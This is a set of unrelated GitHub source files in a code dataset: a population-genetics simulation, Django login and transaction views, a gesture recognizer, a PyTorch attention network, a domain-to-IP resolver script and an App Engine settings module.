Population object\"\"\"\n self.metapopulation = metapopulation\n self.config = config\n\n self.genome_length = config['Population']['genome_length']\n self.stress_survival_rate = config['Population']['stress_survival_rate']\n self.mutation_rate_social = config['Population']['mutation_rate_social']\n self.mutation_rate_adaptation = config['Population']['mutation_rate_adaptation']\n self.dilution_factor = config['Population']['dilution_factor']\n self.dilution_prob_min = config['Population']['dilution_prob_min']\n self.capacity_min = config['Population']['capacity_min']\n self.capacity_max = config['Population']['capacity_max']\n self.capacity_shape = config['Population']['capacity_shape']\n self.production_cost = config['Population']['production_cost']\n self.initialize = config['Population']['initialize']\n\n # Create an empty population\n if self.initialize.lower() == 'empty':\n self.empty()\n elif self.initialize.lower() == 'random':\n self.randomize()\n\n self.delta = zeros(self.abundances.size, dtype=nint32)\n self.diluted = True\n\n\n def __repr__(self):\n \"\"\"Return a string representation of a Population object\"\"\"\n res = \"Population: Size {s}, {p:.1%} producers\".format(s=self.size(),\n p=self.prop_producers())\n return res\n\n\n def empty(self):\n \"\"\"Empty a population\"\"\"\n self.abundances = zeros(2**(self.genome_length + 1), dtype=nuint32)\n\n\n def randomize(self):\n \"\"\"Create a random population\"\"\"\n self.abundances = np.random.random_integers(low=0,\n high=self.capacity_min,\n size=2**(self.genome_length+1))\n\n\n def dilute(self):\n \"\"\"Dilute a population\n \n dilute dilutes the population by the dilution factor, which is specified\n in the Population section of the configuration as dilution_factor.\n\n \"\"\"\n if self.is_empty():\n return\n\n self.diluted = False\n prob_dilute = 1\n\n if self.dilution_prob_min < 1:\n prob_dilute = self.dilution_prob_min + (1.0 - self.dilution_prob_min) * self.prop_producers()\n\n if self.dilution_prob_min == 1 or binomial(n=1, p=prob_dilute, size=1)[0]:\n self.abundances = binomial(self.abundances, self.dilution_factor)\n self.diluted = True\n\n\n def grow(self):\n \"\"\"Grow the population to carrying capacity\n \n The final population size is determined based on the proportion of\n producers present. This population is determined by drawing from a\n multinomial with the probability of each genotype proportional to its\n abundance times its fitness.\n \"\"\"\n\n if self.is_empty() or not self.diluted:\n return\n\n landscape = self.metapopulation.fitness_landscape\n\n final_size = self.capacity_min + \\\n (self.capacity_max - self.capacity_min) * \\\n (self.prop_producers()**self.capacity_shape)\n\n grow_probs = self.abundances * (landscape/nsum(landscape))\n\n if nsum(grow_probs) > 0:\n norm_grow_probs = grow_probs/nsum(grow_probs)\n self.abundances = multinomial(final_size, norm_grow_probs, 1)[0]\n\n self.metapopulation.num_births += self.size()\n\n\n def mutate(self):\n \"\"\"Mutate a Population\n \n Each genotype mutates to another with probability inversely proportional\n to the Hamming distance (# different bits in binary representation)\n between them. The distances between all pairs of genotypes is\n pre-calculated at the beginning of a run and stored in\n metapopulation.mutation_probs.\n \n \"\"\"\n\n if self.is_empty():\n return\n\n if not self.diluted:\n return\n\n mutated_population = zeros(self.abundances.size, dtype=nuint32)\n\n for i in nonzero(self.abundances)[0]:\n mutated_population = nadd(mutated_population,\n multinomial(self.abundances[i],\n self.metapopulation.mutation_probs[i],\n size=1)[0])\n\n self.abundances = mutated_population\n\n\n def select_migrants(self, migration_rate):\n \"\"\"Select individuals to migrate\n \n Select genotypes to migrate. The amount of each genotype that migrates\n is chosen in proportion to that genotype's abundance.\n \n \"\"\"\n\n assert migration_rate >= 0 and migration_rate <= 1\n\n return binomial(self.abundances, migration_rate)\n\n\n def remove_emigrants(self, emigrants):\n \"\"\"Remove emigrants from the population\n \n remove_emigrants removes the given emigrants from the population. The\n genotypes are not immediately removed to the population, but their\n counts are placed in a temporary area until census() is called.\n\n \"\"\"\n self.delta -= emigrants\n\n\n def add_immigrants(self, immigrants):\n \"\"\"Add immigrants to the population\n \n add_immigrants adds the given immigrants to the population. The new\n genotypes are not immediately added to the population, but placed in\n a temporary area until census() is called.\n\n \"\"\"\n self.delta += immigrants\n\n\n def census(self):\n \"\"\"Update the population's abundances after migration\n \n When migration occurs, the immigrants and emigrants are not directly\n accounted for in the list of genotype abundances. This function adds\n immigrants and removes emigrants to/from the abundances.\n \n \"\"\"\n\n self.abundances = nadd(self.abundances, self.delta)\n self.delta = zeros(self.abundances.size, dtype=nint32)\n\n\n def reset_loci(self, num_loci):\n \"\"\"Reset the loci of the population to all zeros\n\n When an environment changes, the population is not yet adapted to it.\n This function captures this change by resetting num_loci fitness-encoding\n loci to zero.\n \"\"\"\n assert num_loci <= self.genome_length\n\n if self.is_empty():\n return\n\n new_abundances = zeros(self.abundances.size, dtype=np.int)\n gs = np.right_shift(np.arange(start=0, stop=2**self.genome_length), num_loci)\n genotypes_shifted = np.append(gs, gs + (2**self.genome_length))\n\n for i in range(2**(self.genome_length+1)):\n new_abundances[genotypes_shifted[i]] += self.abundances[i]\n\n self.abundances = new_abundances\n\n # OLD WAY OF DOING THIS FOR ALL LOCI -------------------------------\n #num_producers = self.num_producers()\n #num_nonproducers = self.num_nonproducers()\n\n #self.abundances = zeros(self.abundances.size, dtype=np.int)\n #self.abundances[0] = num_nonproducers\n #self.abundances[2**self.genome_length] = num_producers\n\n\n def bottleneck(self, survival_rate):\n \"\"\" Pass the population through a bottleneck\n\n This function passes the population through a bottleneck. The\n probability of survival is specified as the survival_rate parameter\n [0,1]. \n \"\"\"\n\n assert survival_rate >= 0\n assert survival_rate <= 1\n\n self.abundances = binomial(self.abundances, survival_rate)\n\n\n def size(self):\n \"\"\"Get the size of the population\"\"\"\n return self.abundances.sum()\n\n\n def __len__(self):\n return self.abundances.sum()\n\n\n def is_empty(self):\n \"\"\"Return whether or not the population is empty\"\"\"\n return self.abundances.sum() == 0\n\n\n def num_producers(self):\n \"\"\"Get the number of producers\"\"\"\n return self.abundances[2**self.genome_length:].sum()\n\n\n def num_nonproducers(self):\n \"\"\"Get the number of non-producers\"\"\"\n return self.abundances[:2**self.genome_length].sum()\n\n\n def prop_producers(self):\n \"\"\"Get the proportion of producers\"\"\"\n popsize = self.abundances.sum()\n \n if popsize == 0:\n return 'NA'\n else:\n return 1.0 * self.num_producers() / popsize\n\n\n def average_fitness(self):\n \"\"\"Get the average fitness in the population\"\"\"\n\n popsize = self.size()\n landscape = self.metapopulation.fitness_landscape\n\n if popsize == 0:\n return 'NA'\n else:\n return nsum(self.abundances * landscape)/popsize\n\n\n def max_fitnesses(self):\n \"\"\"Get the maximum fitness among producers and non-producers\"\"\"\n\n popsize = self.size()\n\n if popsize == 0:\n return (0,0)\n\n # Get the fitnesses of genotypes present in the population\n fitnesses = np.array(self.abundances > 0, dtype=int) * self.metapopulation.fitness_landscape\n\n max_producer = fitnesses[2**self.genome_length:].max()\n max_nonproducer = fitnesses[:2**self.genome_length].max()\n\n return (max_producer, max_nonproducer)\n\n","repo_name":"briandconnelly/hankshaweffect","sub_path":"model/hankshaw/Population.py","file_name":"Population.py","file_ext":"py","file_size_in_byte":11032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35456545989","text":"\"\"\"MAIN VIEWS.py\"\"\"\nfrom __future__ import unicode_literals\nfrom django.contrib import messages\nfrom django.shortcuts import render, HttpResponse, redirect\nfrom .models import *\nimport bcrypt\n# Create your views here.\ndef index(request):\n if 'id' in request.session:\n request.session.clear()\n return render(request, 'main/index.html')\n\ndef register(request):\n if request.method == \"POST\":\n #Validate\n errors = User.objects.basic_validator(request.POST)\n if len(errors) != 0:\n for tag, error in errors.iteritems():#flash messages\n messages.error(request, error, extra_tags=tag)\n #context name username\n context = {\n 'name': request.POST['name'],\n 'username': request.POST['username']\n }\n return render(request, 'main/index.html',context)\n else:\n #Hash password\n hash1 = bcrypt.hashpw(request.POST['password'].encode(), bcrypt.gensalt())\n #Create User(key=request.POST['key'])\n newUser = User(\n name=request.POST['name'],\n username=request.POST['username'],\n password=hash1)\n newUser.save()\n request.session['id'] = User.objects.get(username=request.POST['username']).id\n return redirect('/travels')\n else:\n return redirect('/main')\n\n\ndef login(request):\n if request.method == \"POST\":\n #Validate\n errors = User.objects.login_validator(request.POST)\n if len(errors) != 0:\n for tag, error in errors.iteritems():#flash messages\n messages.error(request, error, extra_tags=tag)\n context = {\n 'lusername': request.POST['username']\n }\n return render(request, 'main/index.html',context)\n else:\n request.session['id'] = User.objects.get(username=request.POST['username']).id\n return redirect('/travels')\n else:\n return redirect('/main')\n\ndef success(request):\n #Find name of user with \n user = User.objects.get(id=request.session)\n context = {'name': user.name}\n return render(request,'/travels',context)\n","repo_name":"mateogolf/SquiggleLines","sub_path":"squiggles/apps/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73201273011","text":"from django.urls import path\nfrom . import views\n\n\napp_name = 'commcare'\nurlpatterns = [\n path(r'', views.home, name='home'),\n path(r'projects/create/', views.create_project, name='create_project'),\n path(r'projects//edit/', views.edit_project, name='edit_project'),\n path(r'accounts/create/', views.create_account, name='create_account'),\n path(r'accounts//edit/', views.edit_account, name='edit_account'),\n]\n","repo_name":"dimagi/commcare-sync","sub_path":"apps/commcare/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"71447815732","text":"from itertools import permutations\n\ndef check(x):\n for i in range(2,x//2 + 1):\n if x % i == 0:\n return 0\n return 1\n\ndef solution(numbers):\n cnt = 0\n for i in range(1,len(numbers)+1):\n a = list(set(permutations(numbers, i)))\n for j in range(len(a)):\n a[j] = list(a[j])\n a[j] = ''.join(a[j])\n if int(a[j]) >= 2 and a[j][0] != '0':\n if check(int(a[j])) == 1:\n cnt += 1\n return cnt","repo_name":"Haram0111/Algorithm","sub_path":"Programmers Lv2/소수 찾기.py","file_name":"소수 찾기.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71702690294","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\nfrom typing import Dict\n\nfrom jinja2 import Template\n\n__version__ = '0.1.0'\n__all__ = ['jinja_tex']\n\n\ndef jinja_tex(tex_template: str, ctx: Dict[str, object]) -> str:\n \"\"\"Render a Jinja TeX template.\n\n Uses ``<>`` for variables, ``<+/+>`` for blocks, and ``<#/#>`` for comments.\n\n :param str tex_template: a Jinja template\n :param dict ctx: a variable context\n \"\"\"\n jinja_template = Template(\n tex_template,\n variable_start_string=r'<<',\n variable_end_string='>>',\n block_start_string='<+',\n block_end_string='+>',\n comment_start_string='<#',\n comment_end_string='#>',\n trim_blocks=True,\n autoescape=False,\n )\n return jinja_template.render(ctx)\n","repo_name":"jhrmnn/mona","sub_path":"src/mona/sci/tex.py","file_name":"tex.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"} +{"seq_id":"8697467106","text":"import numpy as np\nimport math\n\nclass Dollar_One_Model():\n\n def __init__(self):\n self.bounding_box_size = 500\n\n # method used for calculating distance between two 2D points\n def calc_distance(self, p1, p2):\n distance = math.sqrt((p1[0] - p2[0]) ** 2 + (p1[1] - p2[1]) ** 2)\n return distance\n\n # step 1 resample the given points to n evenly spaced points\n def resample_points(self, points, n):\n stroke_length = 0\n i = 1\n new_points = [points[0]]\n # calculate length of stroke\n while i < len(points):\n p1 = points[i - 1]\n p2 = points[i]\n distance = self.calc_distance(p1, p2)\n stroke_length += distance\n i += 1\n\n l = stroke_length / (n - 1)\n distance_sum = 0.0\n i = 1\n while i < len(points):\n p1 = points[i - 1]\n p2 = points[i]\n distance = self.calc_distance(p1, p2)\n if distance_sum + distance >= l:\n x = p1[0] + ((l - distance_sum) / distance) * (p2[0] - p1[0])\n y = p1[1] + ((l - distance_sum) / distance) * (p2[1] - p1[1])\n point = (x, y)\n new_points.append(point)\n points.insert(i, point)\n distance_sum = 0\n else:\n distance_sum += distance\n i += 1\n # taken from: http://depts.washington.edu/acelab/proj/dollar/dollar.js\n if len(new_points) == n - 1:\n # sometimes we fall a rounding-error short of adding the last point\n # so add 1 it if so\n new_points.append(\n (points[len(points) - 1][0], points[len(points) - 1][1]))\n return new_points\n\n # step 2 - decomposed into two methods as suggested in the pseudo-code\n def rotate(self, points):\n new_points = self.rotate_to_zero(points)\n new_points = self.rotate_by(\n new_points, self.indicative_angle(new_points))\n return new_points\n\n def rotate_to_zero(self, points):\n new_points = self.rotate_by(points, -self.indicative_angle(points))\n return new_points\n\n def indicative_angle(self, points):\n x_coordinates = [p[0] for p in points]\n y_coordinates = [p[1] for p in points]\n centroid = (np.mean(x_coordinates), np.mean(y_coordinates))\n indicative_angle = np.arctan2(\n centroid[1] - points[0][1], centroid[0] - points[0][0])\n return indicative_angle\n\n def rotate_by(self, points, angle):\n new_points = []\n x_coordinates = [p[0] for p in points]\n y_coordinates = [p[1] for p in points]\n centroid = (np.mean(x_coordinates), np.mean(y_coordinates))\n for p in points:\n qx = (p[0] - centroid[0]) * np.cos(angle) - (p[1] - centroid[1]) * np.sin(angle) + centroid[0]\n qy = (p[0] - centroid[0]) * np.sin(angle) + (p[1] - centroid[1]) * np.cos(angle) + centroid[1]\n new_points.append((qx, qy))\n return new_points\n\n # step 3 - the initial size of the bounding box is set with 500\n def scale(self, points):\n new_points = self.scale_to_square(points, self.bounding_box_size)\n new_points = self.translate_to_origin(new_points)\n return new_points\n\n def scale_to_square(self, points, size):\n new_points = []\n x_coordinates = [p[0] for p in points]\n y_coordinates = [p[1] for p in points]\n min_x, min_y = np.min(x_coordinates), np.min(y_coordinates)\n max_x, max_y = np.max(x_coordinates), np.max(y_coordinates)\n\n box_width = max_x - min_x\n box_height = max_y - min_y\n\n for p in points:\n qx = p[0] * (size / box_width)\n qy = p[1] * (size / box_height)\n new_points.append((qx, qy))\n return new_points\n\n def translate_to_origin(self, points):\n new_points = []\n x_coordinates = [p[0] for p in points]\n y_coordinates = [p[1] for p in points]\n centroid = (np.mean(x_coordinates), np.mean(y_coordinates))\n\n for p in points:\n qx = p[0] - centroid[0]\n qy = p[1] - centroid[1]\n new_points.append((qx, qy))\n return new_points\n\n # step 4 - we integrated some error handling\n # for the case that the gesture has not been recorded yet\n # an angle of 45 degrees and a thresold of 2 degrees is\n # suggested in the paper\n def recognize(self, points, gestures):\n b = np.inf\n template_angle = 45 # degrees\n template_thresold = 2\n # if no gestures have been recorded:\n updated_template = \" no recorded gestures\"\n for template in gestures:\n if gestures[template] == []:\n continue\n d = self.distance_at_best_angle(\n points, gestures[template], template_angle, -template_angle, template_thresold)\n if d < b:\n b = d\n updated_template = template\n score = 1 - (b / 0.5 * np.sqrt(\n self.bounding_box_size ** 2 + self.bounding_box_size ** 2))\n print(\"template: \", updated_template)\n print(\"score: \", score)\n return updated_template # , score\n\n # The golden ratio calculates an angle\n def distance_at_best_angle(self, points, template, angle_a, angle_b, angle_threshold):\n golden_ratio = 0.5 * (-1 + np.sqrt(5))\n x1 = golden_ratio * angle_a + (1 - golden_ratio) * angle_b\n f1 = self.distance_at_angle(points, template, x1)\n x2 = (1 - golden_ratio) * angle_a + golden_ratio * angle_b\n f2 = self.distance_at_angle(points, template, x2)\n\n while np.abs(angle_b - angle_a) > angle_threshold:\n if f1 < f2:\n angle_b = x2\n x2 = x1\n f2 = f1\n x1 = golden_ratio * angle_a + (1 - golden_ratio) * angle_b\n f1 = self.distance_at_angle(points, template, x1)\n else:\n angle_a = x1\n x1 = x2\n f1 = f2\n x2 = (1 - golden_ratio) * angle_a + golden_ratio * angle_b\n f2 = self.distance_at_angle(points, template, x2)\n return min(f1, f2)\n\n def distance_at_angle(self, points, template, angle):\n new_points = self.rotate_by(points, angle)\n d = self.path_distance(new_points, template)\n return d\n\n def path_distance(self, a, b):\n d = 0\n for i in range(len(a)):\n d = d + self.calc_distance(a[i], b[i])\n return d / len(a)\n","repo_name":"ITT-21SS-UR/assignment9-km-9","sub_path":"dollar_one_model.py","file_name":"dollar_one_model.py","file_ext":"py","file_size_in_byte":6552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15294533486","text":"from rest_framework.views import APIView\nfrom django.utils.decorators import method_decorator\nfrom rest_framework.response import Response\nfrom mastermind_api.utils.db import DbConnection\nfrom django.views.decorators.csrf import csrf_exempt\nfrom mastermind_api.utils.auth import AccessTokenRequire\nfrom django.core.exceptions import SuspiciousOperation\n\n@method_decorator([csrf_exempt, AccessTokenRequire], name=\"dispatch\")\nclass SetBalance(APIView):\n '''\n To take care of transaction handling debit/credit of amount from a specific account.\n It looks for three values (contact_number, amount,trantype) to make a transaction.\n '''\n def __init__(self):\n pass\n\n def post(self, request, **kwargs):\n response = {}\n try:\n if kwargs[\"is_validate\"] is True:\n parameters = []\n request_details = request.data\n\n if 'contact_number' in request_details:\n parameters.append(str(request_details['contact_number']))\n else:\n return Response(\"contact_number doesn't exist in request.\")\n\n if 'amount' in request_details:\n parameters.append(float(request_details['amount']))\n else:\n return Response(\"amount doesn't exist in request.\")\n\n if 'trantype' in request_details:\n parameters.append(request_details['trantype'])\n else:\n return Response(\"trantype doesn't exist in request.\") \n\n parameters.append('')\n db_conn = DbConnection()\n response = db_conn.execute_statement(proc_name= \"sp_set_balance\", commit= True, params = parameters)\n message,status = \"\",False\n\n if response.get_ErrorMessage():\n message = response.get_ErrorMessage()\n else:\n message = response.get_Params()[len(parameters)-1]\n status = True\n\n return Response({\"Message\":message,\"Data\":None,\"Status\":status})\n else:\n raise SuspiciousOperation(\"Access Token Require!!!!\")\n except Exception as error:\n raise SuspiciousOperation(\"Bad Request \" + str(error))\n \n@method_decorator([csrf_exempt,AccessTokenRequire],name=\"dispatch\")\nclass GetAllTransactions(APIView):\n '''\n To list all transaction on most recent first fashion. Request should have contact_number,offset\n and total_count parameters in request. \n \n '''\n def __init__(self):\n pass\n\n def post(self, request, **kwargs): \n response = {}\n try:\n if kwargs[\"is_validate\"] is True: \n parameters = []\n request_details = request.data\n\n if 'contact_number' in request_details:\n parameters.append(request_details['contact_number'])\n else:\n return Response(\"contact_number doesn't exist in request.\")\n\n if 'offset' in request_details:\n parameters.append(request_details['offset'])\n else:\n return Response(\"offset doesn't exist in request.\")\n\n if 'total_count' in request_details:\n parameters.append(request_details['total_count'])\n else:\n return Response(\"total_count doesn't exist in request.\")\n\n parameters.append('')\n db_conn = DbConnection()\n response = db_conn.execute_statement(proc_name= \"sp_get_transaction_details\", commit= True, params = parameters)\n message, status, data = \"\", False, None\n\n if response.get_Data():\n data = response.get_Data()[0]\n status = True\n elif response.get_ErrorMessage():\n message = response.get_ErrorMessage()\n else:\n message = response.get_Params()[len(parameters)-1]\n\n return Response({\"Message\":message,\"Data\":data,\"Status\":status})\n else:\n raise SuspiciousOperation(\"Access Token Require!!!!\")\n except Exception as error:\n raise SuspiciousOperation(\"Bad Request \" + str(error)) ","repo_name":"pkmishra47/DjangoRestAPI","sub_path":"mastermind/mastermind_api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14681977269","text":"## Basecode for this hAttention Network is taken from the following Github Repo:\n## https://github.com/SSinyu/Hierarchical-Attention-Networks\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.init as init\nfrom torch.autograd import Variable\nimport numpy as np\n#from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\nclass AttentionLayer(nn.Module):\n def __init__(self, num_hid=100, bi=True):\n super(AttentionLayer, self).__init__()\n self.num_hid = num_hid\n self.linear_ = nn.Linear(self.num_hid, self.num_hid)\n self.tanh_ = nn.Tanh()\n self.softmax_ = nn.Softmax(dim=1)\n\n def forward(self, x):\n #print(\"x.shape: \", x.shape)\n u_context = torch.nn.Parameter(torch.FloatTensor(self.num_hid).normal_(0, 0.01)).cuda()\n h = self.tanh_(self.linear_(x)).cuda()\n sm = torch.mul(h, u_context)\n return sm, 0\n #print(\"sm.shape: \", sm.shape)\n alpha = self.softmax_(sm.sum(dim=0, keepdim=True)) # (x_dim0, x_dim1, 1)\n #print(\"alpha.shape: \", alpha.shape)\n attention_output = torch.mul(alpha, x).sum(dim=1) # (x_dim0, x_dim2)\n #print(\"attention_output.shape: \", attention_output.shape)\n return attention_output, alpha\n\n\nclass HierarchicalAttentionNet(nn.Module):\n def __init__(self, in_dim, num_hid, nlayers, bidirect, dropout, rnn_type='GRU'):\n super(HierarchicalAttentionNet, self).__init__()\n self.in_dim = in_dim\n self.num_hid = num_hid\n self.nlayers = nlayers\n self.rnn_type = rnn_type\n self.rnn = nn.LSTM if rnn_type == 'LSTM' else nn.GRU\n self.ndirections = 1 + int(bidirect)\n self.word_rnn = self.rnn(in_dim, num_hid, nlayers, dropout=dropout, bidirectional=bidirect, batch_first=True)\n self.word_att = AttentionLayer(num_hid, bidirect)\n\n def init_hidden(self, batch):\n # just to get the type of tensor\n weight = next(self.parameters()).data\n hid_shape = (self.nlayers * self.ndirections, batch, self.num_hid)\n if self.rnn_type == 'LSTM':\n return (Variable(weight.new(*hid_shape).zero_()),\n Variable(weight.new(*hid_shape).zero_()))\n else:\n return Variable(weight.new(*hid_shape).zero_())\n\n def forward(self, x):\n # x: [batch, sequence, in_dim]\n #print(\"x.shap: \", x.shape)\n batch = x.size(0)\n hidden = self.init_hidden(batch)\n self.word_rnn.flatten_parameters()\n output, hidden = self.word_rnn(x, hidden)\n #print(\"output.shape: \", output.shape)\n\n if self.ndirections == 1:\n #print(\"output.shape: \", output.shape)\n #print(\"output[:, -1].shape: \", output[:, -1].shape)\n attn, _ = self.word_att(output[:, -1])\n #print(\"attn.shape: \", attn.shape)\n return attn\n\n forward_ = output[:, -1, :self.num_hid]\n backward = output[:, 0, self.num_hid:]\n attn, _ = self.word_att((forward_, backward), dim=1)\n return attn\n\n def forward_all(self, x):\n # x: [batch, sequence, in_dim]\n batch = x.size(0)\n hidden = self.init_hidden(batch)\n self.word_rnn.flatten_parameters()\n output, hidden = self.word_rnn(x, hidden)\n attn, _ = self.word_att(output)\n return attn\n","repo_name":"Sanjeev2487/caption_guided_vqa","sub_path":"models/hAttention.py","file_name":"hAttention.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73996463731","text":"import socket\nimport sys\nimport time\ndef domain2ip(domains):\n for domain in domains:\n domain = domain.strip()\n try:\n ip = socket.gethostbyname(domain)\n except:\n ip = '127.0.0.1'\n print(ip,domain)\n\n\n\nif __name__ == '__main__':\n if sys.argv[1] == '--stdin':\n domains = sys.stdin.read().split(\"\\n\")\n domain2ip(domains)\n\n\n else:\n domain_file = sys.argv[1]\n domains = open(domain_file,'r').readlines()\n domain2ip(domains)\n\n \n\n","repo_name":"githubmaidou/tools","sub_path":"domain2ip.py","file_name":"domain2ip.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":295,"dataset":"github-code","pt":"21"} +{"seq_id":"10284801223","text":"import collections\nimport re\nimport string\n\n#\n# App identity settings.\n#\nAPP_IDENTITY_DEV = 'google.com:netdesign-dev'\nAPP_IDENTITY_TEST = 'google.com:netdesign-test'\nAPP_IDENTITY_DEMO = 'google.com:netdesign-demo'\nAPP_IDENTITY_STAGING = 'google.com:netdesign-staging'\nAPP_IDENTITY_PRODBACKUP = 'google.com:netdesign-prodbackup'\nAPP_IDENTITY_ACT = 'google.com:netdesign-act'\nAPP_IDENTITY_ACT2 = 'google.com:netdesign-act2'\nAPP_IDENTITY_PROD = 'google.com:netdesign'\nAPP_IDENTITY_ANT = 'google.com:netdesign-ant'\nAPP_IDENTITY_ANTBOM = 'google.com:netdesign-antbom'\nAPP_IDENTITY_TESTBED = 'testbed-test'\nAPP_IDENTITY_DEVAPPSERVER = 'auto'\nDEFAULT_MODULE_NAME = 'default'\nIMPORT_MODULE_NAME = 'importer'\n\n#\n# App Engine server map.\n#\nSERVERS = {\n 'local': ('localhost:9000', 'dev~auto'),\n 'dev': ('netdesign-dev.googleplex.com', 's~google.com:netdesign-dev'),\n 'test': ('netdesign-test.googleplex.com', 's~google.com:netdesign-test'),\n 'demo': ('netdesign-demo.googleplex.com', 's~google.com:netdesign-demo'),\n 'staging': ('netdesign-staging.googleplex.com',\n 's~google.com:netdesign-staging'),\n 'prodbackup': ('netdesign-prodbackup.googleplex.com',\n 's~google.com:netdesign-prodbackup'),\n 'act': ('netdesign-act.googleplex.com', 's~google.com:netdesign-act'),\n 'ant': ('netdesign-ant.googleplex.com', 's~google.com:netdesign-ant'),\n 'antbom': ('netdesign-antbom.googleplex.com',\n 's~google.com:netdesign-antbom'),\n 'act2': ('netdesign-act2.googleplex.com', 's~google.com:netdesign-act2'),\n 'prod': ('netdesign.googleplex.com', 's~google.com:netdesign'),\n 'testbed': (None, None),\n}\n\n#\n# Tasks module related settings.\n#\nTASKS_MODULE_NAME = 'tasks'\n\n# Queue names.\nACT_QUEUE_NAME = 'act'\nBACKUP_QUEUE_NAME = 'backup'\nBATCH_QUEUE_NAME = 'batch'\nBOM_QUEUE_NAME = 'bom-jobs'\nDB_RESTORE_QUEUE_NAME = 'db-restore'\nFK_QUEUE_NAME = 'fks'\nEXTERNAL_QUEUE_NAME = 'external'\nEXTERNAL_BAZOOKA_QUEUE_NAME = 'external-bazooka'\nEXTERNAL_HARDWARE_QUEUE_NAME = 'external-hardware'\nEXTERNAL_TRAFFIC_QUEUE_NAME = 'external-traffic'\nEXTERNAL_NCSYNC_QUEUE_NAME = 'external-ncsync'\nHISTORY_QUEUE_NAME = 'history'\nIMPORTER_QUEUE_NAME = 'importer'\nTASKS_QUEUE_NAME = TASKS_MODULE_NAME\nUNM_EXPORT_QUEUE_NAME = 'unm-export'\nUNM_UPDATE_QUEUE_NAME = 'unm-update'\n\n# The base application module. Used for relative imports.\nBASE_MODULE = '_base'\n\n# Constants for metadata.\nMETADATA_BACKUP = 'backup'\nMETADATA_UPDATE_SEARCH = 'update_search'\n\n# A list of modules to search for Models (relative to BASE_MODULE). The order\n# of the modules is not maintained, and every Model should have a unique name.\nMODEL_MODULES = ()\n# MODEL_MODULES = (\n# '.admin.admin_models',\n# '.bigquery.bigquery_models',\n# '.capacity.capacity_models',\n# '.bom.bom_item_models',\n# '.bom.bom_models',\n# '.btp.btp_models',\n# '.cables.cable_models',\n# '.circuits.circuit_models',\n# '.circuits.circuit_element_models',\n# '.circuits.subcircuits.sub_circuit_models',\n# '.common.common_models',\n# '.capacity.activities_models',\n# '.devices.device_models',\n# '.devices.logical_device_models',\n# '.devices.splice_models',\n# '.email.email_models',\n# '.fallout.fallout_models',\n# '.file_attachments.file_attachments_models',\n# '.hardware.hardware_models',\n# '.history.history_models',\n# '.importer.importer_models',\n# '.locations.building.building_models',\n# '.locations.floor.floor_models',\n# '.locations.inventory.inventory_location_models',\n# '.locations.osp_container.osp_container_models',\n# '.locations.space.space_models',\n# '.locations.subbuilding.subbuilding_models',\n# '.locations.location_models',\n# '.logical_locations.logical_location_models',\n# '.logs.logs_models',\n# '.manufacturers.manufacturer_models',\n# '.metadata.metadata_models',\n# '.mutex.mutex_models',\n# '.netcracker.netcracker_models',\n# '.on_network_inventory_mapping.on_network_inventory_mapping_models',\n# '.optical_span.optical_span_models',\n# '.orders.order_item_models',\n# '.orders.order_models',\n# '.parts.part_models',\n# '.paths.path_models',\n# '.permissions.permission_models',\n# '.ports.port_status_models',\n# '.ports.reservation_models',\n# '.racks.rack_models',\n# '.recon.device_recon_models',\n# '.sequences.sequence_models',\n# '.sockets.socket_models',\n# '.traffic.traffic_models',\n# '.user.user_preference_models',\n# '.vcs.vcs_refs',\n# '.vendors.vendor_models',\n# '.transport.physical_spof.physical_spof_models',\n# '.transport.submarine_oms_ots.submarine_oms_ots_models',\n# '.transport.thirdparty_transport.thirdparty_transport_models',\n# '.transport.transport_models',\n# '.circuits.act_path_tx_models',\n# '.netcracker.bazooka_models',\n# '.cron.cron_models',)\n\n# Groups.\nDH_ADMIN_GROUP = '%doublehelix-admin'\nDH_DESIGN_GROUP = '%doublehelix-design'\nDH_RO_GROUP = '%doublehelix-ro'\nDH_RW_GROUP = '%doublehelix-rw'\nDH_SUPPLYCHAIN_GROUP = '%doublehelix-supplychain'\nDH_SUPPLYCHAIN_LOGISTICS_TVCS_GROUP = '%doublehelix-supplychain-logistics-tvcs'\nDH_SUPPLYCHAIN_PLANNER_TVCS_GROUP = '%doublehelix-supplychain-planner-tvcs'\nNETDESIGN_GROUP = '%netdesign'\n\n# Default model permissions.\n# Keep in sync with matching client constants.\nPERMISSIONS_DEFAULT_READ = [\n DH_ADMIN_GROUP,\n DH_DESIGN_GROUP,\n DH_RO_GROUP,\n DH_RW_GROUP,\n DH_SUPPLYCHAIN_GROUP,\n NETDESIGN_GROUP,\n]\n\nPERMISSIONS_DEFAULT_WRITE = [\n DH_ADMIN_GROUP,\n DH_DESIGN_GROUP,\n DH_RW_GROUP,\n DH_SUPPLYCHAIN_GROUP,\n NETDESIGN_GROUP,\n]\n\n# The processes which can update the model permissions\nADMIN_SCREEN = 'Admin screen'\nPERMISSIONS_YAML_UPLOAD = 'Permissions yaml upload'\nMETADATA_UPDATES = 'Metadata updates'\n\n# The environments label\nENV_PROD = 'prod'\nENV_STAGING = 'staging'\nENV_PRODBACKUP = 'prodbackup'\n\n# TODO(logant@) Put all DH application settings constants here.\n# Application setting constants\nDH_SETTING_BTP_ERROR_NOTIFY_ADDRESS = 'BTP_ERROR_NOTIFY_ADDRESS'\n\n# Constants for SpaceContents/Rack View 